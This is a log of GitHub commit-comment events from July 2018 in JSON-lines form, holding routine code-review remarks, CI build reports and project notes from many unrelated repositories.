{"id":"7996087823","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29781930,"position":null,"line":null,"path":null,"commit_id":"0f595ccfe511236202a955e961a947ba5c476772","created_at":"2018-07-20T16:49:13Z","updated_at":"2018-07-20T16:49:13Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-843](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-843).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-843-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T16:49:13Z"}
{"id":"7996099523","type":"CommitCommentEvent","actor":{"login":"ydkhatri"},"repo":{"name":"ydkhatri/MacForensics"},"payload":{"comment":{"id":29781955,"position":null,"line":null,"path":null,"commit_id":"84dd1dc9f89c5dd410ee99443bc3646ce035aa63","created_at":"2018-07-20T16:51:46Z","updated_at":"2018-07-20T16:51:46Z","author_association":"OWNER","body":"Moved to its own repo here:\r\nhttps://github.com/ydkhatri/APFS_010"}},"created_at":"2018-07-20T16:51:46Z"}
{"id":"7996107910","type":"CommitCommentEvent","actor":{"login":"Bumbleboss"},"repo":{"name":"Bumbleboss/bumbleboss.github.io"},"payload":{"comment":{"id":29781971,"position":null,"line":null,"path":null,"commit_id":"bcc36c8209d4937ab23f03e47f7afb513b56b5ef","created_at":"2018-07-20T16:53:40Z","updated_at":"2018-07-20T16:53:40Z","author_association":"OWNER","body":"oh yes!!!"}},"created_at":"2018-07-20T16:53:40Z"}
{"id":"7996109441","type":"CommitCommentEvent","actor":{"login":"acarta"},"repo":{"name":"acarta/flowplots"},"payload":{"comment":{"id":29781972,"position":null,"line":null,"path":null,"commit_id":"0168c568753c316aa6f7e5f2d4baa11192aa59ec","created_at":"2018-07-20T16:54:02Z","updated_at":"2018-07-20T16:54:02Z","author_association":"OWNER","body":"Another thing to fix: the title is based directly on the filename, so if you're not in the actual data dir it'll include a bunch of subdir names\r\n"}},"created_at":"2018-07-20T16:54:02Z"}
{"id":"7996110634","type":"CommitCommentEvent","actor":{"login":"tienxuantt"},"repo":{"name":"tienxuantt/test"},"payload":{"comment":{"id":29781973,"position":1,"line":1,"path":"xuan","commit_id":"9d15a0710d2343ce06209295969504c7f2c4f970","created_at":"2018-07-20T16:54:17Z","updated_at":"2018-07-20T16:54:17Z","author_association":"OWNER","body":"tùng"}},"created_at":"2018-07-20T16:54:17Z"}
{"id":"7996110636","type":"CommitCommentEvent","actor":{"login":"tienxuantt"},"repo":{"name":"tienxuantt/test"},"payload":{"comment":{"id":29781974,"position":1,"line":1,"path":"xuan","commit_id":"9d15a0710d2343ce06209295969504c7f2c4f970","created_at":"2018-07-20T16:54:17Z","updated_at":"2018-07-20T16:54:17Z","author_association":"OWNER","body":"tùng"}},"created_at":"2018-07-20T16:54:17Z"}
{"id":"7996110642","type":"CommitCommentEvent","actor":{"login":"tienxuantt"},"repo":{"name":"tienxuantt/test"},"payload":{"comment":{"id":29781975,"position":1,"line":1,"path":"xuan","commit_id":"9d15a0710d2343ce06209295969504c7f2c4f970","created_at":"2018-07-20T16:54:17Z","updated_at":"2018-07-20T16:54:17Z","author_association":"OWNER","body":"tùng"}},"created_at":"2018-07-20T16:54:17Z"}
{"id":"7996112308","type":"CommitCommentEvent","actor":{"login":"fdrtec"},"repo":{"name":"ccem-dev/otus-api"},"payload":{"comment":{"id":29781983,"position":25,"line":25,"path":"otus-center/src/main/java/org/ccem/otus/validators/FieldCenterValidator.java","commit_id":"9e513124a4a66a6ecd30adb89c53c2d3c41ac006","created_at":"2018-07-20T16:54:40Z","updated_at":"2018-07-20T16:54:40Z","author_association":"CONTRIBUTOR","body":"refatoração feita\r\n"}},"created_at":"2018-07-20T16:54:40Z"}
{"id":"7996113004","type":"CommitCommentEvent","actor":{"login":"kristina-islo"},"repo":{"name":"stevertaylor/enterprise_extensions"},"payload":{"comment":{"id":29781984,"position":null,"line":null,"path":null,"commit_id":"489c4c5f6f32fbf83cb0dc30deebdd16b66dbaba","created_at":"2018-07-20T16:54:50Z","updated_at":"2018-07-20T16:54:50Z","author_association":"NONE","body":"There's a left bracket missing."}},"created_at":"2018-07-20T16:54:50Z"}
{"id":"7996121603","type":"CommitCommentEvent","actor":{"login":"mythi"},"repo":{"name":"MCamp859/clear-linux-documentation"},"payload":{"comment":{"id":29782000,"position":102,"line":102,"path":"source/clear-linux/tutorials/kata.rst","commit_id":"97d04158e444be80b3739082b5fc74a6656abac3","created_at":"2018-07-20T16:56:46Z","updated_at":"2018-07-20T16:56:46Z","author_association":"COLLABORATOR","body":"The new info should go in the bash section above:\r\n\r\n```\r\nsudo mkdir -p /etc/systemd/system/docker.service.d/\r\ncat <<EOF | sudo tee /etc/systemd/system/docker.service.d/51-runtime.conf\r\n[Service]\r\nEnvironment=\"DOCKER_DEFAULT_RUNTIME=--default-runtime kata-runtime\"\r\n```"}},"created_at":"2018-07-20T16:56:46Z"}
{"id":"7996121900","type":"CommitCommentEvent","actor":{"login":"eunjeongsong"},"repo":{"name":"eunjeongsong/song-blog-project"},"payload":{"comment":{"id":29782003,"position":null,"line":null,"path":null,"commit_id":"68eab55ee005c73e0ae41e6caad407548525f1b2","created_at":"2018-07-20T16:56:50Z","updated_at":"2018-07-20T16:56:50Z","author_association":"OWNER","body":"#### dev start\r\ndev 인  경우 /src 디렉토리 변경 내용을 watch 하여 /dist 디렉토리로 복사하고, /dist 디렉토리를 워치하여 browser 가 동적으로 화면 변경할 수 있도록 구성\r\n\r\n#### prod build\r\nprod 인 경우 /src 디렉토리의 내용을 /dist 디렉토리로 복사할 수 있도록 구성"}},"created_at":"2018-07-20T16:56:50Z"}
{"id":"7996125895","type":"CommitCommentEvent","actor":{"login":"AnnieYousar"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":29782013,"position":null,"line":null,"path":null,"commit_id":"94e85c02f20edef97cf56e7fb7def88bf799f021","created_at":"2018-07-20T16:57:43Z","updated_at":"2018-07-20T16:57:43Z","author_association":"NONE","body":"I'm fine with the changes Kurt proposes. Maybe it is useful to point to the URL, where the script can be executed: http://magma.maths.usyd.edu.au/calc.\r\nAdditionally I would like to ask, why `RSA_MIN_MODULUS_BITS` is defined (512) in `rsa_locl.h`, whereas the corresponding `MAX_BITS` is defined as **`OPENSSL_RSA_MAX_MODULUS_BITS`** in `rsa.h`? Isn't the latter the better place to define a `OPENSSL_RSA_MIN_MODULUS_BITS`? "}},"created_at":"2018-07-20T16:57:43Z"}
{"id":"7996126024","type":"CommitCommentEvent","actor":{"login":"iamzozo"},"repo":{"name":"WordPress/gutenberg"},"payload":{"comment":{"id":29782014,"position":61,"line":61,"path":"packages/api-fetch/README.md","commit_id":"247a6e07c22792769c4d397ad3a6d118dbc90a77","created_at":"2018-07-20T16:57:44Z","updated_at":"2018-07-20T16:57:44Z","author_association":"NONE","body":"`rootURL` as parameter"}},"created_at":"2018-07-20T16:57:44Z"}
{"id":"7996128590","type":"CommitCommentEvent","actor":{"login":"acarta"},"repo":{"name":"acarta/flowplots"},"payload":{"comment":{"id":29782019,"position":null,"line":null,"path":null,"commit_id":"0de03cbff4ea81a0b9c485ca5a8b5964c366d00b","created_at":"2018-07-20T16:58:21Z","updated_at":"2018-07-20T16:58:21Z","author_association":"OWNER","body":"This is still hacky as hell... Probably could use some tweaking for better style."}},"created_at":"2018-07-20T16:58:21Z"}
{"id":"7996129252","type":"CommitCommentEvent","actor":{"login":"ollieestuff"},"repo":{"name":"ollieestuff/madru-nerd"},"payload":{"comment":{"id":29782020,"position":null,"line":null,"path":null,"commit_id":"3fca7bde72f33b64149db7659ea5cea7139c6938","created_at":"2018-07-20T16:58:31Z","updated_at":"2018-07-20T16:58:31Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Featured Posts Front-End e Design](https://trello.com/c/27LTb1jV/21-featured-posts-front-end-e-design)"}},"created_at":"2018-07-20T16:58:31Z"}
{"id":"7996135131","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29782031,"position":50,"line":78,"path":"test/tests.js","commit_id":"b2fdff5bdfc8408b8037a15bdf8dd2c567f92d45","created_at":"2018-07-20T16:59:39Z","updated_at":"2018-07-20T16:59:39Z","author_association":"OWNER","body":"Hi Rob are you saying that (even if this was the correct approach) it should be\r\n\r\n `.then(balance1 => assert.deepEqual(balance1, half))\r\n .then(return splitter.queryShare(secondRecipient)`"}},"created_at":"2018-07-20T16:59:39Z"}
{"id":"7996140321","type":"CommitCommentEvent","actor":{"login":"Skywalker-11"},"repo":{"name":"mailwatch/MailWatch"},"payload":{"comment":{"id":29782039,"position":null,"line":null,"path":null,"commit_id":"40d93c82e654ac801fb53eff442670e78ef5c232","created_at":"2018-07-20T17:00:38Z","updated_at":"2018-07-20T17:00:38Z","author_association":"MEMBER","body":"#1096"}},"created_at":"2018-07-20T17:00:38Z"}
{"id":"7996145244","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29782046,"position":null,"line":null,"path":null,"commit_id":"e44e0dd1abf047e51ce6fac097dcea356a74c4fe","created_at":"2018-07-20T17:01:37Z","updated_at":"2018-07-20T17:01:37Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-39](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-39).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-39-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-20T17:01:37Z"}
{"id":"7996145694","type":"CommitCommentEvent","actor":{"login":"mythi"},"repo":{"name":"MCamp859/clear-linux-documentation"},"payload":{"comment":{"id":29782047,"position":4,"line":52,"path":"source/clear-linux/tutorials/kata_migration.rst","commit_id":"97d04158e444be80b3739082b5fc74a6656abac3","created_at":"2018-07-20T17:01:42Z","updated_at":"2018-07-20T17:01:42Z","author_association":"COLLABORATOR","body":"The changes here are:\r\n\r\n1. Section _Disable Clear Containers manager configuration_ can be dropped\r\n2. Item 1. in _Enable Kata Containers as default_ becomes same as I wrote above"}},"created_at":"2018-07-20T17:01:42Z"}
{"id":"7996146193","type":"CommitCommentEvent","actor":{"login":"redking12"},"repo":{"name":"kuntao-development/android_device_lenovo_kuntao"},"payload":{"comment":{"id":29782049,"position":null,"line":null,"path":null,"commit_id":"23dba90c82f90b7026776f57231933f5e1216275","created_at":"2018-07-20T17:01:49Z","updated_at":"2018-07-20T17:01:49Z","author_association":"NONE","body":"authorship to mike?"}},"created_at":"2018-07-20T17:01:49Z"}
{"id":"7996147452","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29782054,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-20T17:02:04Z","updated_at":"2018-07-20T17:02:04Z","author_association":"NONE","body":"Correct-merge-mistake-with-initializing-CoilDesWaterDeltaT (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2942 of 2942 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-20T17:02:04Z"}
{"id":"7996149289","type":"CommitCommentEvent","actor":{"login":"redking12"},"repo":{"name":"kuntao-development/android_device_lenovo_kuntao"},"payload":{"comment":{"id":29782057,"position":null,"line":null,"path":null,"commit_id":"1e116e1f26a4b8d95994c1fd6721cfa92b532d76","created_at":"2018-07-20T17:02:27Z","updated_at":"2018-07-20T17:02:27Z","author_association":"NONE","body":"sed -i \"s/Fix/Enable\" ?"}},"created_at":"2018-07-20T17:02:27Z"}
{"id":"7996153051","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29782060,"position":null,"line":null,"path":null,"commit_id":"a3244a621c5a0608d0897ea606a09dd662c96daa","created_at":"2018-07-20T17:03:18Z","updated_at":"2018-07-20T17:03:18Z","author_association":"OWNER","body":" If a thread's score is VALUE_MATE_IN_MAX_PLY, then isn't it always the\nhighest score?\nThen, I don't understand what this extra condition does.  Any chance you\ncould take a min an explain it to me?\n\n\nOn Fri, Jul 20, 2018 at 10:42 AM, Andrew Grant <notifications@github.com>\nwrote:\n\n> You won't get anyone to agree to remove this. Also, it will pass, because\n> barring a surprise mate in N, this condition will never trigger before\n> normal adjudication.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/protonspring/Stockfish/commit/a3244a621c5a0608d0897ea606a09dd662c96daa#commitcomment-29781845>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AcVnSOLekZX3Rgw1GCflUZCgi0V4JFqdks5uIgiCgaJpZM4VYYd2>\n> .\n>\n\n\n\n-- \nMichael T. Whiteley\nmobile: 801.707.6886\n"}},"created_at":"2018-07-20T17:03:18Z"}
{"id":"7996154635","type":"CommitCommentEvent","actor":{"login":"redking12"},"repo":{"name":"kuntao-development/android_device_lenovo_kuntao"},"payload":{"comment":{"id":29782065,"position":null,"line":null,"path":null,"commit_id":"4a4670b54fb5d4eaa5176f7fcec441fa80d33899","created_at":"2018-07-20T17:03:42Z","updated_at":"2018-07-20T17:03:42Z","author_association":"NONE","body":"all other lines except 28,29 dont belong to this commit"}},"created_at":"2018-07-20T17:03:42Z"}
{"id":"7996154829","type":"CommitCommentEvent","actor":{"login":"Rbiessy"},"repo":{"name":"Brolock/tensorflow"},"payload":{"comment":{"id":29782066,"position":121,"line":327,"path":"tensorflow/core/kernels/check_numerics_op.cc","commit_id":"044898e7b2190ffb171be4f8f486ab903b6f3137","created_at":"2018-07-20T17:03:45Z","updated_at":"2018-07-20T17:03:45Z","author_association":"NONE","body":"Can you remove this extra line?"}},"created_at":"2018-07-20T17:03:45Z"}
{"id":"7996160449","type":"CommitCommentEvent","actor":{"login":"mythi"},"repo":{"name":"MCamp859/clear-linux-documentation"},"payload":{"comment":{"id":29782076,"position":4,"line":52,"path":"source/clear-linux/tutorials/kata_migration.rst","commit_id":"97d04158e444be80b3739082b5fc74a6656abac3","created_at":"2018-07-20T17:05:04Z","updated_at":"2018-07-20T17:05:04Z","author_association":"COLLABORATOR","body":"@MCamp859 btw, in my opinion, it'd be better to just merge these two tutorials because they have so much in common. Your thoughts?"}},"created_at":"2018-07-20T17:05:04Z"}
{"id":"7996160733","type":"CommitCommentEvent","actor":{"login":"fkue469577"},"repo":{"name":"fkue469577/javaDemo"},"payload":{"comment":{"id":29782077,"position":null,"line":null,"path":null,"commit_id":"e8ca17689821c0a8dd8fc72d0e56a9f427bc91bc","created_at":"2018-07-20T17:05:08Z","updated_at":"2018-07-20T17:05:08Z","author_association":"OWNER","body":"课程目标：\r\n\t事务回顾\r\n\tSpring事务管理的一组API\r\n\tSpring的编程式事务管理\r\n\tSpring的声明式事务管理\r\n\r\n什么是事务\r\n\t事务指的是逻辑上的一组操作，这组操作要么全部成功，要么全部失败。\r\n\r\n事务的特性：\r\n\t原子性：事务是一个不可分割的工作单位，十五中的操作要么都发生，要么都不发生\r\n\t一致性：事务前后数据的完整性必须保持一致\r\n\t隔离性：多个用户并发访问数据库时，一个用户的事务不能被其他用户的事务所干扰，多个并发事务之间数据要相互隔离。\r\n\t持久性：事务一旦被提交，他对数据库中数据的改变就是永久性的，即使数据库发生故障也不应该对其有任何影响。。\r\n\r\nSpring事务管理高层抽象主要主要包括3个接口\r\n\tPlatformTransactionManager事务管理器\r\n\tTransactionDefinition事务定义信息（隔离、传播、超时、只读）\r\n\tTransactionStatus事务具体运行状态\r\n\r\n如果不考虑隔离性，会引发安全问题如下：\r\n\t脏读：一个事务读取了另一个事务改写但还未提交的数据，如果这些数据被回滚，则独到的额数据是无效的。\r\n\t不可重复读：在同一事务中，多次读取同一数据返回的结果有所不同。\r\n\t幻读：一个事务读取了几行记录后，另一个书屋插入一些记录，幻读就发生了。在后来的查询中，第一个事务就会发现有些原来没有的记录。\r\n\r\n事务隔离级别\r\nisolation_default 使用后端数据库默认的隔离级别（spring中的选择项）\r\nisolation_read_uncommitted 允许另外一个事务可以看到这个事务未提交的数据。这种隔离级别会产生脏读，不可重复读和幻读\r\nisolation_read_commmitted 保证一个事务修改的数据提交后才能被另外一个事务读取。\r\nisolation_repeatable_read 这种事务隔离级别可以防止脏读，不可重复读。但是可能出现幻读。\r\nisolation_serializable 可以防止脏读，不可重复读外，还避免了幻读。\r\n\r\n事务传播属性\r\n1、propagation_required\t如果存在一个事务，则支持当前事务。如果没有事务则开启一个新的事务。\r\n2、propagation_mandatory\t支持当前事务，如果当前没有事务， 就跑出异常\r\n3、propagation_never 以非事务方式执行，如果当前存在事务，则跑出异常\r\n4、propagation_not_supported\t以非事务方式执行操作，如果当前存在事务，就把当前事务挂起。\r\n5、propagation_requires_new\t新建事务，如果当前存在，把当前事务挂起。\r\n6、propagation_supports\t支持当前事务，如果当前没有事务，就以非事务方式执行\r\n7、propagation_nested\t\t支持当前事务，新增savepoint点， 与当前事务同步提交或回滚\r\n\r\nSpring 支持两种方式事务管理\r\n\t编程式的事务管理\r\n\t\t通过TransactionTemplate手动管理(在实际应用中很少用到)\r\n\t声明式事务管理\r\n\t\t基于TransactionProxyFactoryBean的方式。（很少使用）\r\n\t\t基于AspectJVM的XML方式。（经常使用\r\n\t\t基于注解方式。（经常使用）\r\n\t\t\t配置简单。需要在业务层类上添加一个@Transactional的主机e\r\n\r\n编程式的事务控制\r\n\t在AccountService中使用TransactionTemplate\r\n\tTransactionTemplate依赖DataSourceTransactionManager\r\n\tDataSourceTransactionManager依赖DataSource"}},"created_at":"2018-07-20T17:05:08Z"}
{"id":"7996161384","type":"CommitCommentEvent","actor":{"login":"Rbiessy"},"repo":{"name":"Brolock/tensorflow"},"payload":{"comment":{"id":29782078,"position":130,"line":350,"path":"tensorflow/core/kernels/check_numerics_op.cc","commit_id":"044898e7b2190ffb171be4f8f486ab903b6f3137","created_at":"2018-07-20T17:05:17Z","updated_at":"2018-07-20T17:05:17Z","author_association":"NONE","body":"This should be `REGISTER_SYCL_KERNELS`."}},"created_at":"2018-07-20T17:05:17Z"}
{"id":"7996165688","type":"CommitCommentEvent","actor":{"login":"cgcloud-jenkins"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":29782085,"position":null,"line":null,"path":null,"commit_id":"457d4918aa490e63e013e3c837ec218cdb85f5e0","created_at":"2018-07-20T17:06:19Z","updated_at":"2018-07-20T17:06:19Z","author_association":"NONE","body":"[Jenkins vg tests](http://jenkins.cgcloud.info/job/vg/2023/) complete for merge to master.  View the [full report here](http://cgl-pipeline-inputs.s3.amazonaws.com/vg_cgl/vg_ci/jenkins_reports/branch/master/index.html).\n\n19 tests passed, 0 tests failed and 10 tests skipped in 21370 seconds\n\nTests produced 2792 warnings. 2792 were for lower-than-expected alignment scores\n\n"}},"created_at":"2018-07-20T17:06:19Z"}
{"id":"7996166975","type":"CommitCommentEvent","actor":{"login":"Ernesto7426"},"repo":{"name":"Ernesto7426/udemy-heroes-2"},"payload":{"comment":{"id":29782090,"position":1,"line":5,"path":"villanos.md","commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-20T17:06:34Z","updated_at":"2018-07-20T17:06:34Z","author_association":"OWNER","body":"## Joker este es mi villano favorito"}},"created_at":"2018-07-20T17:06:34Z"}
{"id":"7996169589","type":"CommitCommentEvent","actor":{"login":"gbatra17"},"repo":{"name":"arabold/serverless-sentry-lib"},"payload":{"comment":{"id":29782094,"position":null,"line":null,"path":null,"commit_id":"c227846fba6b773037871ab0cd86d3f8ee5bb4c2","created_at":"2018-07-20T17:07:11Z","updated_at":"2018-07-20T17:07:11Z","author_association":"NONE","body":"According to: https://aws.amazon.com/blogs/compute/node-js-8-10-runtime-now-available-in-aws-lambda/, the handler now only requires the event parameter. \r\n\r\nI'm currently trying to implement Raven with AWS Lambda using the async keyword and it's not working - any other guidance?"}},"created_at":"2018-07-20T17:07:11Z"}
{"id":"7996169747","type":"CommitCommentEvent","actor":{"login":"Ernesto7426"},"repo":{"name":"Ernesto7426/udemy-heroes-2"},"payload":{"comment":{"id":29782096,"position":null,"line":null,"path":null,"commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-20T17:07:13Z","updated_at":"2018-07-20T17:07:13Z","author_association":"OWNER","body":"# Notas\r\nEntiendo por que agregaste a DeadShot, lo necesitaremos"}},"created_at":"2018-07-20T17:07:13Z"}
{"id":"7996169971","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29782098,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-20T17:07:16Z","updated_at":"2018-07-20T17:07:16Z","author_association":"NONE","body":"Correct-merge-mistake-with-initializing-CoilDesWaterDeltaT (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2982 of 2982 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-20T17:07:16Z"}
{"id":"7996170078","type":"CommitCommentEvent","actor":{"login":"MatSilvaC"},"repo":{"name":"q-box/q-box.github.io"},"payload":{"comment":{"id":29782099,"position":null,"line":null,"path":null,"commit_id":"a327f2d43d29a95c435b5acc66d02dadf5fd1933","created_at":"2018-07-20T17:07:18Z","updated_at":"2018-07-20T17:07:18Z","author_association":"CONTRIBUTOR","body":"Cap. 02 Slide corrigido\r\n"}},"created_at":"2018-07-20T17:07:18Z"}
{"id":"7996176848","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29782114,"position":null,"line":null,"path":null,"commit_id":"a3244a621c5a0608d0897ea606a09dd662c96daa","created_at":"2018-07-20T17:09:00Z","updated_at":"2018-07-20T17:09:00Z","author_association":"NONE","body":"Suppose we have two threads, a main thread and a two helper threads. \r\n\r\nThe main thread, at the time of this statement, has finished a depth 10 search. It has found a score of +800cp.\r\nHelper thread one, at a depth of 9!, has just found a Mate in 4.\r\nHelper thread two, at a depth of 11, has just found a +15.00 score.\r\n\r\nUnder this case, I believe we would return the +1500 score, since the depth 9 score would be passed over since it comes from a lower depth search than the main thread's +800 score"}},"created_at":"2018-07-20T17:09:00Z"}
{"id":"7996179368","type":"CommitCommentEvent","actor":{"login":"PeteTheHeat"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29782122,"position":5,"line":447,"path":"React/Views/ScrollView/RCTScrollView.m","commit_id":"f96d7ae6486eb245496c0fef07239ae0480e88b6","created_at":"2018-07-20T17:09:37Z","updated_at":"2018-07-20T17:09:37Z","author_association":"CONTRIBUTOR","body":"Hey @karanjthakkar, I had no idea this use case would break when I wrote that diff.  \r\n\r\nI was a little weary using `conformsToProtocol` here, but I couldn't do a class check. Nothing broke internally so I figured it was safe. \r\n\r\nThe only alternative I can think of is creating a new protocol that means \"this view is a refresh control, do something special\". That would solve the issue of mistaking content views as refresh controls. \r\n\r\nThe other alternative is to rethink how refresh controls work with RCTScrollView, but that seems like a larger undertaking with little payoff. "}},"created_at":"2018-07-20T17:09:37Z"}
{"id":"7996183892","type":"CommitCommentEvent","actor":{"login":"raphinesse"},"repo":{"name":"apache/cordova-common"},"payload":{"comment":{"id":29782131,"position":128,"line":128,"path":"src/PackageHelper.js","commit_id":"80947b1c0b0ef600ce09e472c4fad00a0ce9c65e","created_at":"2018-07-20T17:10:44Z","updated_at":"2018-07-20T17:10:44Z","author_association":"CONTRIBUTOR","body":"Sorry that I haven't found time for a proper review. But here's a thought that occurred when skimming over this:\r\n\r\nShouldn't writes be explicit? Maybe avoiding unnecessary writes with a dirty bit?"}},"created_at":"2018-07-20T17:10:44Z"}
{"id":"7996187658","type":"CommitCommentEvent","actor":{"login":"superqw3rty"},"repo":{"name":"superqw3rty/665451-pink"},"payload":{"comment":{"id":29782143,"position":null,"line":null,"path":null,"commit_id":"ef9c2e1094e19ae6717d27a3bad82f473dafac4e","created_at":"2018-07-20T17:11:35Z","updated_at":"2018-07-20T17:11:35Z","author_association":"OWNER","body":"arrow style"}},"created_at":"2018-07-20T17:11:35Z"}
{"id":"7996191889","type":"CommitCommentEvent","actor":{"login":"renahnschultz"},"repo":{"name":"renahnschultz/odonto-system-manager"},"payload":{"comment":{"id":29782151,"position":null,"line":null,"path":null,"commit_id":"d0bf7790fddf6b3d5227ff2d42751b200b9f0592","created_at":"2018-07-20T17:12:34Z","updated_at":"2018-07-20T17:12:34Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criação do template do sistema.](https://trello.com/c/H6MrdHsK/4-cria%C3%A7%C3%A3o-do-template-do-sistema)"}},"created_at":"2018-07-20T17:12:34Z"}
{"id":"7996193307","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29782154,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-20T17:12:54Z","updated_at":"2018-07-20T17:12:54Z","author_association":"NONE","body":"Correct-merge-mistake-with-initializing-CoilDesWaterDeltaT (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-20T17:12:54Z"}
{"id":"7996195432","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29782157,"position":null,"line":null,"path":null,"commit_id":"0d828a78c982fb2289b86ec619896bfda55c29d7","created_at":"2018-07-20T17:13:24Z","updated_at":"2018-07-20T17:13:24Z","author_association":"COLLABORATOR","body":"OK. It looks like these test-cases have a flaw.\r\n\r\nWe must check the return value of regcomp(3) and regexec(3) for error.\r\n\r\n```\r\nRETURN VALUE\r\n\r\n    Upon successful completion, the regcomp() function shall return 0. Otherwise, it shall return an integer value indicating an error as described in <regex.h>, and the content of preg is undefined. If a code is returned, the interpretation shall be as given in <regex.h>.\r\n\r\n    If regcomp() detects an invalid RE, it may return REG_BADPAT, or it may return one of the error codes that more precisely describes the error.\r\n\r\n    Upon successful completion, the regexec() function shall return 0. Otherwise, it shall return REG_NOMATCH to indicate no match.\r\n```\r\n\r\n-- http://pubs.opengroup.org/onlinepubs/9699919799/functions/regcomp.html\r\n\r\nAccording to my interpretation, every failure must be handled with proper return value. No crashes are allowed."}},"created_at":"2018-07-20T17:13:24Z"}
{"id":"7996196285","type":"CommitCommentEvent","actor":{"login":"renahnschultz"},"repo":{"name":"renahnschultz/odonto-system-manager"},"payload":{"comment":{"id":29782159,"position":null,"line":null,"path":null,"commit_id":"e126aa9fc139dc4e0d657c44d957dda98e0005e6","created_at":"2018-07-20T17:13:36Z","updated_at":"2018-07-20T17:13:36Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Cadastro teste inicial.](https://trello.com/c/cvVOTitZ/5-cadastro-teste-inicial)"}},"created_at":"2018-07-20T17:13:36Z"}
{"id":"7996197146","type":"CommitCommentEvent","actor":{"login":"sstolov"},"repo":{"name":"sstolov/1"},"payload":{"comment":{"id":29782166,"position":2,"line":2,"path":"1","commit_id":"ada9e64fa34f2865969589d656a03ec5c699a37b","created_at":"2018-07-20T17:13:47Z","updated_at":"2018-07-20T17:13:47Z","author_association":"OWNER","body":"kiuhikjnl"}},"created_at":"2018-07-20T17:13:47Z"}
{"id":"7996198164","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29782169,"position":10,"line":10,"path":"tests/fuzz/regex/libc/regcomp.c","commit_id":"0d828a78c982fb2289b86ec619896bfda55c29d7","created_at":"2018-07-20T17:14:01Z","updated_at":"2018-07-20T17:14:01Z","author_association":"COLLABORATOR","body":"Return value must be checked for error."}},"created_at":"2018-07-20T17:14:01Z"}
